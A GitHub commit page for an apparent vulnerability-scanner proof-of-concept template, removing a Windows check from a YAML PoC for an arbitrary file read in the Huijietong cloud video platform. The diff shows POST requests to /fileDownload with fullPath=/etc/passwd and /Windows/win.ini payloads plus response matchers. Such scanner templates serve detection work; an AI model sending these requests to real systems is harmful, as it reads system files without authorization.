Skip to content

Commit

Permalink
Update huijietong-cloud-video-platform-fileread.yml (chaitin#1333)
Browse files Browse the repository at this point in the history
chaitin#1257 wins 的部分似乎缺少盘符,不过经过各种测试,并没有发现命中 windows 的情况,所以先把 wins 去掉了
  • Loading branch information
smile-jpg authored Jun 19, 2021
1 parent ab4ac80 commit 0ea3abf
Showing 1 changed file with 0 additions and 6 deletions.
6 changes: 0 additions & 6 deletions pocs/huijietong-cloud-video-platform-fileread.yml
Original file line number Diff line number Diff line change
Expand Up @@ -6,12 +6,6 @@ groups:
body: fullPath=/etc/passwd
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
wins:
- method: POST
path: /fileDownload?action=downloadBackupFile
body: fullPath=/Windows/win.ini
expression: |
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:
author: B1anda0(https://github.com/B1anda0)
links:
Expand Down

0 comments on commit 0ea3abf

Please sign in to comment.